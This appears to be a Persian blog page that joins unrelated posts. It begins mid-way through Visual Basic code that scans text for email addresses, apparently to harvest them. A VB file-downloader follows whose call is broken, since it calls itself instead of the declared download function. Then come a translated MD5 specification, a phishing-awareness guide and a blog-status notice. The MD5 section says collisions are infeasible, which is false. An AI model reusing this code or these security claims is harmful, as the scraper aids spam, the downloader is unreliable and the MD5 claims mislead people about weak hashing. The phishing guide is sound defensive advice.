s = mid_(a$, j, 1)
Loop While s = 1
Do
j = j + 1
s = mid_(a$, j, 1)
If s = 1 Then name_ = name_ + Mid$(a$, j, 1)
Loop While s = 1
s = 0: k = 0
For j2 = 1 To Len(name_)
If Mid$(name_, j2, 1) = "@" Then k = k + 1
If Mid$(name_, j2, 1) = "." Then s = 1
Next
If k = 1 And s = 1 And Len(name_) > 5 And Left$(name_, 1) <> "@" And
Right$(name_, 1) <> "@" Then MsgBox name_
'Then UserForm1.addr.AddItem Name_
End If
If Mid$(a$, i, 1) <> "@" Then s$ = s$ + Mid$(a$, i, 1) Else s$ = s$ + " "
Next
search_ = s$
End Function
در پروسیژر فوق یک فایل از یک URL دانلود میگردد.
این هم یک روش فشرده تر شده برای برای کسانی که از کد های زیاد متنفر هستند.
DownLoadPlugin "URL of the plugin", "name of the plugin"
Code & Exemple:
Private Sub Download()
DownLoadPlugin "http://matrixvx.org", "plugin.plg"
End Sub

Public Declare Function DoFileDownload Lib "shdocvw.dll" (ByVal lpszFile As
String) As Long
Public Sub DownLoadPlugin(urlz As String, plugin As String)
Dim DL As Long
On Error GoTo errorz
If urlz$ = "" Then urlz$ = strUrl$
If strUrl$ = "" Then strUrl$ = urlz$
If Left(strUrl$, 4) <> "http" Then strUrl$ = "http://" & strUrl$
If Right$(strUrl$, 1) <> "/" Then strUrl$ = strUrl$ & "/"
If Left$(plugin$, 1) = "/" Then plugin = Mid$(plugin$, 2)
DL& = DownLoadPlugin(StrConv(strUrl$ & plugin$, vbUnicode))
Exit Sub
errorz:
MsgBox "Can't download the fucking file" & urlz & plugin$ & ".",
vbCritical,
"Oshibka - ERROR !!!!"
End Sub

---

نويسنده: Herbod

 سر فصل ها:

1- خلاصه
2- شرایط و نکات لازم
3- توضیحات الگوریتم MD5
4- نتیجه
5- پا نویس

مترجم: امید متقی راد



1- خلاصه:
در این مقاله با الگوریتم "خلاصه پیام MD5" آشنا می شویم. این الگوریتم یک رشته با طول متفاوت را به عنوان ورودی می گیرد و یک "خلاصه پیام MD5" یا "اثر انگشت" با طول 128 بیت می سازد.
در این روش اینکه دو پیام مختلف دارای یک "خلاصه پیام" باشند یا اینکه یک رشته از روی یک "خلاصه پیام" ساخته شود غیر ممکن می باشد. این الگوریتم برای امضاهای دیجیتال مناسب است، جایی که احتیاج به خلاصه کردن یک فایل بزرگ در یک رشتهء امن و فشرده، قبل از کد کردن آن متن، در سیستم های کدینگ، با کلید های خصوصی و عمومی آن سیستم مانند RSA (Rivest Shamir Adelman)
الگوریتم MD5 برای داشتن سرعت بالا در ماشین های 32 بیتی طراحی شده است در عین حال احتیاجی به جانشینی ها در جداول بزرگ ندارد. این الگوریتم را با کدهای بسیار کمی می توان نوشت.
الگوریتم MD5 توسعه ای از الگوریتم MD4 می باشد با این تفاوت که MD5 کمی کندتر از MD4 عمل می کند اما در طراحی آن بسیار محافظه کارانه عمل شده است.
MD5 به این دلیل طراحی شد که حس کردند MD4 به عنوان سرعت بالایی که داشت پذیرفته شده و از امنیت بالایی در شرایط بحرانی برخوردار نمی باشد. MD4 برای سرعت بالا طراحی شده ولی احتمال شکست آن در رمز کردنی موفق وجود دارد. MD5 کمی در سرعت کند شده با این تفاوت که بیشترین امنیت را داراست. این الگوریتم حاصل تاثیر دادن نظرات تعدادی از استفاده کنندگان MD4 به همراه مقادیری تغییر در ساختار الگوریتم برای افزایش سرعت و قدرت آن می باشد. الگوریتم MD5 در این مکان عومی قرارگرفته تا از آن استفاده و در صورت امکان استاندارد شود.

2- شرایط و نکات لازم:
در این متن منظور از « کلمه» تعداد 32 بیت و «بایت» تعداد 8 بیت داده می باشد. یک صف از بیت ها دارای خصوصیات طبیعی یک صف از بایتها می باشند که هر گروه هشت تایی متوالی از بیتها یک بایت را تشکیل می دهند که پرارزش ترین بیت در ابتدا قرار دارد. یک صف از بایت ها دقیقا مشابه یک صف 32 بیتی از کلمات پردازش می شود. جایی که گروهی 4 تایی از توالی بایتها پردازش می شوند، کم ارزش ترین بایت اولین بایت می باشد.
اجازه بدهید از x_i بجای xi (x اندیس i ) استفاده کنیم و اگر مقدار اندیس یک عبارت محاسباتی بود آن را در {} محدود می کنیم، مانند: x_{i-1} . همچنین از ^ به عنوان علامت توان استفاده می کنیم، پس x^i یعنیx به توان i .
اجازه بدهید از علامت «+» برای اضافه کردن دو کلمه به هم استفاده کنیم. از x<<<5 به عنوان عملگر چرخش بیتی در کلمات استفاده می شود کهx به اندازه 5 بیت به چپ چرخش می کند.
از not (x) به عنوان عملگر نقیض بیتی، از X v Y به عنوان عملگر فصل (or) و از X xor Y به عنوان عملگر exclusive or و از XY به عنوان عملگر عطف (and) استفاده می کنیم.

3- توضیحات الگوریتم MD5:
فرض کنید ما b بیت پیام به عنوان ورودی داریم و تصمیم داریم خلاصه پیام آن را بدست آوریم. b در اینجا یک عدد نا منفی و صحیح است، b می تواند مقدار صفر داشته باشد و هیچ محدودیتی برای مضرب هشت بودن آن نیست و به هر اندازه می تواند بزرگ باشد. فرض کنید بیت های این پیام را بشود به صورت زیر نوشت:
m_0 m_1 ... m_{b-1}
برای آوردن خلاصه پیام 5 مرحله زیر را انجام می دهیم:

گام 1- اضافه کردن بیتهای نرم کننده:
طول پیام مورد نظر به 448 به پیمانه 512 توسعه پیدا می کند به این معنی که اگر به طول پیام 64 بیت اضافه شود، طولش مضربی از 512 خواهد بود. عمل توسعه دادن همیشه اجرا می شود مگر اینکه طول پیام به صورت 448 به پیمانه 512 باشد.
عمل توسعه پیام یا نرم کردن آن به صورت زیر انجام می شود:
یک بیت [1] سپس تعدادی بیت [0] به پیام اضافه می شود.اضافه شدن بیت های 0 تا زمانی که طول رشته به 448 بر پایه 512 برسد، ادامه پیدا می کند. در این عمل حداقل یک بیت و حداکثر 512 بیت اضافه خواهد شد.

گام 2- افزایش طول:
یک نمایش 64 بیتی از b بیت پیام اولیه به آخر نتیجه گام قبل اضافه می شود. در بدترین حالت، b بزرگتر از 64 بیت خواهد بود. در این حالت فقط 64 بیت کم ارزش b استفاده خواهد شد.
هم اکنون طول پیام بدست آمده دقیقا معادل مضربی از 512 خواهد بود. مشابه اینکه بگوییم، این پیام طولی معادل مضربی از16 کلمه دارد اجازه بدهید M[0…N-1] را نمایانگر کلمات پیام بدست آمده بدانیم. (N مضربی از 16 می باشد.)

گام 3- یین بافر برای MD:
برای محاسبه خلاصه پیام یک بافر 4 کلمه ای (A,B,C,D) استفاده می شود. هر کدام از A، B، Cو D یک ثبات 32 بیتی می باشند. این ثبات ها مطابق جدول زیر مقدار دهی می شوند ( بایتهای کم ارزش در ابتدا قرار دارند )
word A: 01 23 45 67
word B: 89 ab cd ef
word C: fe dc ba 98
word D: 76 54 32 10

گام 4- پردازش پیام در بلاک های 16 کلمه ای:
در ابتدا 4 تابع کمکی تعریف می کنیم که هر کدام به عنوان ورودی سه کلمهء 32 بیتی می گیرد و برای خروجی یک کلمهء 32 بیتی تولید می کند.
F(X,Y,Z) = XY v not(X) Z
G(X,Y,Z) = XZ v Y not(Z)
H(X,Y,Z) = X xor Y xor Z
I(X,Y,Z) = Y xor (X v not(Z))
در هر موقعیت بیتی، F به عنوان شرط عمل می کند: اگر X آنگاه Y در غیر این صورت Z. تابع F می توانست طوری تعریف شود که به جای استفاده از v از + استفاده کند چون XY و not(X) هرگز یک هایی در موقعیت بیتی یکسان نخواهد داشت. جالب است به یاد داشته باشید که اگر بیت های X، Y و Z مستقل و غیر مرتبط باشند، هر بیت از F(X, Y, Z) مستقل و غیر مرتبط خواهد بود.
توابع G، H و I شبیه تابع F هستند، به طوری که آنها در "توازی بیتی" کار می کنند تا خروجی شان را از بیت های X، Y و Z تولید کنند. در چنین روشی اگر بیت های متناظر X، Y و Z مستقل و غیر مرتبط باشند، آنگاه هر بیت از G(X, Y, Z)، H(X, Y, Z) و I(X, Y, Z) مستقل و غیر مرتبط خواهند بود.
توجه داشته باشید که تابع H، تابع XOR یا توازن بیتی از ورودی هایش است. این گام از یک جدول 64 عنصری T[1…64] ساخته شده از یک تابع مثلثاتی، استفاده می کند. اجازه دهید T[i]، I-امین عنصر جدول را مشخص می کند که برابر است با قسمت صحیح حاصلضرب 4294967296 در abs(sin(i))، به طوری که I به رادیان باشد.
کارهای زیر را انجام می دهید:

/* Process each 16-word block. */
For i = 0 to N/16-1 do

/* Copy block i into X. */
For j = 0 to 15 do
Set X[j] to M[i*16+j].
end /* of loop on j */

/* Save A as AA, B as BB, C as CC, and D as DD. */
AA = A
BB = B
CC = C
DD = D

/* Round 1. */
/* Let [abcd k s i] denote the operation
a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 0 7 1] [DABC 1 12 2] [CDAB 2 17 3] [BCDA 3 22 4]
[ABCD 4 7 5] [DABC 5 12 6] [CDAB 6 17 7] [BCDA 7 22 8]
[ABCD 8 7 9] [DABC 9 12 10] [CDAB 10 17 11] [BCDA 11 22 12]
[ABCD 12 7 13] [DABC 13 12 14] [CDAB 14 17 15] [BCDA 15 22 16]

/* Round 2. */
/* Let [abcd k s i] denote the operation
a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 1 5 17] [DABC 6 9 18] [CDAB 11 14 19] [BCDA 0 20 20]
[ABCD 5 5 21] [DABC 10 9 22] [CDAB 15 14 23] [BCDA 4 20 24]
[ABCD 9 5 25] [DABC 14 9 26] [CDAB 3 14 27] [BCDA 8 20 28]
[ABCD 13 5 29] [DABC 2 9 30] [CDAB 7 14 31] [BCDA 12 20 32]

/* Round 3. */
/* Let [abcd k s t] denote the operation
a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 5 4 33] [DABC 8 11 34] [CDAB 11 16 35] [BCDA 14 23 36]
[ABCD 1 4 37] [DABC 4 11 38] [CDAB 7 16 39] [BCDA 10 23 40]
[ABCD 13 4 41] [DABC 0 11 42] [CDAB 3 16 43] [BCDA 6 23 44]
[ABCD 9 4 45] [DABC 12 11 46] [CDAB 15 16 47] [BCDA 2 23 48]

/* Round 4. */
/* Let [abcd k s t] denote the operation
a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */
/* Do the following 16 operations. */
[ABCD 0 6 49] [DABC 7 10 50] [CDAB 14 15 51] [BCDA 5 21 52]
[ABCD 12 6 53] [DABC 3 10 54] [CDAB 10 15 55] [BCDA 1 21 56]
[ABCD 8 6 57] [DABC 15 10 58] [CDAB 6 15 59] [BCDA 13 21 60]
[ABCD 4 6 61] [DABC 11 10 62] [CDAB 2 15 63] [BCDA 9 21 64]

/* Then perform the following additions. (That is increment each
of the four registers by the value it had before this block
was started.) */
A = A + AA
B = B + BB
C = C + CC
D = D + DD

end /* of loop on i */

گام 5- خروجی:
خلاصه پیامی که به عنوان خروجی تولید می شود و عبارت است از A، B، C و D، که ما با کم ارزش ترین بیت A شروع می کنیم و به با ارزش ترین بیت D خاتمه می دهیم. این تعریف MD5 را کامل می کند.

4- نتیجه:
الگوریتم خلاصه پیام MD5 به سادگی قابل اجرا می باشد و یک "اثر انگشت" یا "خلاصه پیام" از پیام با طول اختیاری تولید می کند. گمان برده می شود که امکان مواجه شدن با دو پیام که خلاصه پیام مشابهی دارند از رتبهء 64^2 و برای هر پیامی که به آن یک خلاصه پیام داده شده است از رتبهء 128^2 می باشد.
الگوریتم MD5 برای نقاط ضعف به دقت بررسی شده است. به هر حال این الگوریتم نسبتا جدید است و تحلیل امنیتی بیشتری را طلب می کند، مشابه طرح های مشابه در این رده .

 هنگامی که گمان می کردید که می توانید با اطمینان به سراغ میل باکس خود بروید، نوع جدیدی از تقلب در راه بود. Phishing؛ حیله های phishing چیزی فراتر از هرزنامه های ناخواسته و مزاحم هستند. آنها می توانند منجر به دزدیده شدن شماره های اعتباری، کلمات عبور، اطلاعات حساب یا سایر اطلاعات شخصی شما شوند.

Phishing چیست؟

نوعی از فریب است که برای دزدیدین هویت شما طراحی شده است. در یک حیله از نوع phishing، یک فرد آسیب رسان سعی می کند تا اطلاعاتی مانند شماره های اعتباری و کلمات عبور یا سایر اطلاعات شخصی شما را با متقاعد کردن شما به دادن این اطلاعات تحت ادعاهای دروغین بدست آورد. این نوع حملات معمولاً از طریق هرزنامه یا پنجره های pop-up می آیند.




Phishing چگونه کار می کند؟

یک فریب phishing توسط یک کاربر بداندیش که میلیون ها ایمیل فریبنده ارسال می کند، آغاز می شود بطوریکه بنظر می رسد که از وب سایتهای معروف یا از سایت های که مورد اعتماد شما هستند، مانند شرکت کارت اعتباری یا بانک شما می آیند. ایمیل ها و وب سایتهایی که از طریق ایمیل ها برای شما ارسال می شود، آنقدر رسمی بنظر می رسند که بسیاری از مردم را به این باور می رسانند که قانونی هستند. با این باور که این ایمیل ها واقعی هستند، افراد زودباور اغلب به تقاضای این ایمیل ها مبنی بر شماره های کارت اعتباری، کلمات عبور و سایر اطلاعات شخصی پاسخ می دهند.

یک جاعل! لینکی در یک ایمیل جعلی قرار می دهد که اینگونه بنظر می رسد که لینک به وب سایت واقعی است، اما در واقع شما را به سایت تقلبی یا حتی یک پنجره pop-up می برد که دقیقاً مانند سایت اصلی بنظر می رسد. این کپی ها اغلب وب سایت های spoofed نامیده می شوند. زمانیکه شما در یکی از این وب سایت ها یا pop-upهای تقلبی هستید ممکن است ناآگاهانه حتی اطلاعات شخصی بیشتری وارد کنید که مستقیماً به شخصی که این سایت تقلبی را درست کرده است، ارسال خواهد شد. این شخص آن موقع می تواند از این اطلاعات برای خرید کالا یا تقاضا برای یک کارت اعتباری جدید یا سرقت هویت شما اقدام کند.



پنج روش که به شما در محافظت از خودتان در مقابل phishing کمک می کند

همانند دنیای فیزیکی، جاعلان در دنیای اینترنت ایجاد روش های جدید و گمراه کننده تر را برای فریب شما ادامه می دهند. اما پی گیری این پنج روش به شما برای محافظت از اطلاعات شخصیتان کمک می کند.

۱- هرگز به تقاضاهایی که از طریق ایمیل یا پنجره های pop-up اطلاعات شخصی شما را می خواهند، پاسخ ندهید. اگر شک دارید، با موسسه ای که مدعی ارسال ایمیل یا پنجره pop-up است، تماس بگیرید.

اکثر مراکز تجاری قانونی، کلمات عبور، شماره کارت های اعتباری و سایر اطلاعات شخصی را از طریق ایمیل مورد سوال قرار نخواهند داد. اگر ایمیلی اینچنین دریافت کردید، پاسخ ندهید. اگر فکر می کنید که ایمیل صحت دارد، برای تایید از طریق تلفن یا وب سایتشان با آنها تماس بگیرید. اگر احساس می کنید که هدف یک حیله phishing قرار گرفته اید، گام بعدی را برای بهترین روش های رفتن به وب سایت ببینید.

۲- وب سایت ها را با تایپ آدرس آنها در address bar ببینید.

اگر شک دارید که ایمیل از شرکت کارت اعتباری، بانک، سرویس پرداخت آنلاین یا وب سایتهای دیگری است که با آنها تجارت انجام می دهید نباشد، لینک ها را از طریق ایمیل برای رفتن به وب سایت دنبال نکنید. آن لینک ها ممکن است شما را به سایت جعلی ببرند که تمام اطلاعاتی را که وارد می کنید برای جاعل آن سایت ارسال کنند.

حتی اگر address bar آدرس درستی نشان می دهد، خطر آن را نپذیرید. چندین روش برای هکرها وجود دارد تا یک URL جعلی در address bar مرورگرتان نمایش دهند. نسخه های جدیدتر مرورگرها جعل آدرس را مشکل تر می کنند، بنابراین بهتر است که مرورگرتان را مرتب به روز نگهدارید. اگر فکر می کنید که این به روزرسانی ها را همواره به یاد نخواهید داشت، می توانید کامپیوترتان را برای بروزرسانی های خودکار پیکربندی کنید.

۳- بررسی کنید تا مطمئن شوید که وب سایت از رمزنگاری استفاده می کند.

اگر به دسترسی به وب سایت از طریق address bar اعتماد ندارید، چگونه میدانید که ممکن است امن باشد؟ چند روش مختلف وجود دارد. نخست، قبل از وارد کردن هرگونه اطلاعات شخصی، بررسی کنید که آیا سایت از رمزنگاری برای ارسال اطلاعات شخصی شما استفاده می کند. در اینترنت اکسپلورر می توانید این عمل را با دیدن آیکون قفل زردرنگی که در status bar نشان داده می شود، بررسی کنید.




این نشانه دلالت بر استفاده از وب سایت از رمزنگاری برای کمک به محافظت از اطلاعات حساس دارد. ـ شمار کارت اعتباری، شماره امنیتی اجتماعی، جزئیات پرداخت – که شما وارد می کنید.

بر روی این علامت دوبار کلیک کنید تا گواهی امنیتی برای سایت نشان داده شود. نام بعد از Issued to باید با سایتی که در آن حاضر هستید مطابقت کند. اگر نام متفاوت است، احتمالاً در سایت جعلی قرار دارید. اگر مطمئن نیستید که یک گواهی قانونی است، هیچ اطلاعات شخصی وارد نکنید. احتیاط کنید و سایت را ترک کنید.

۴- بطور منظم اعلامیه های کارت اعتباری و بانک تان را مرور کنید.

حتی اگر سه مرحله قبل را انجام می دهید، هنوز ممکن است قربانی دزدی هویت شوید. اگر اعلامیه های بانک تان و کارت اعتباری تان را حداقل ماهانه مرور کنید، ممکن است بتوانید یک جاعل را شناسایی و از وارد آمدن خسارات قابل توجه جلوگیری کنید.

۵- سو ءاستفاده های مشکوک از اطلاعات شخصیتان را به مراکز مناسب گزارش کنید.

اگر قربانی چنین حقه ای بوده اید باید:

· فوراً جعل را به شرکتی که جعل در مورد آن صورت گرفته است، گزارش کنید. اگر مطمئن نیستید که چگونه با شرکت تماس بگیرید، وب سایت شرکت را برای گرفتن اطلاعات صحیح تماس، نگاه کنید. شرکت ممکن است یک آدرس ایمیل مخصوص برای گزارش چنین سو ءاستفاده ای داشته باشد. بخاطر داشته باشید که هیچ لینکی را در ایمیل phishing که دریافت کرده اید، دنبال نکنید. باید آدرس شناخته شده شرکت را مستقیماً در address bar مرورگرتان تایپ کنید.

· جزئیات جعل را، مانند ایمیل هایی که دریافت کرده اید، به مراکز ذیصلاح قانونی همچون [URL=http://www.ifccfbi.gov/index.asp]مرکز شکایات تقلب های اینترنتی[/URL] گزارش کنید. این مرکز در کل دنیا برای از کار اندازی سایت های phishing و شناسایی افراد پشت این کلاه برداری ها، کار می کند.

در چنین شرایطی برای آموختن نحوه به حداقل رساندن میزان خسارت می توانید به [URL=http://www.consumer.gov/idtheft/]وب سایت دزدی هویت FTC [/URL] سر بزنید.

منبع: ircert.com

                                              

سلام به همه دوستان و علاقه مندان این وبلاگ همان طور که همه میدونید این وبلاگ ف ی ل ت ر شده بود بعدشم یه نفر این دامین منو رجیستر کرد واسه خودش !

میدونید که بلاگفا زیر حملات Ddos ,.... کمرش برید و ترس مدیران بلاگفا از دست دادن دامین blogfa.com الان که میبینید این وبلاگ دوباره به راه به احتمال زیاد از خیرو برکت بک آپ از سایته که خود مدیران ریستور کردن ( مسخرست نه ؟ )

به هر حال دستشون درد نکنه منم که برگشتم

 خبر بازگشایی این وبلاگو به دوستان و ..... بگویید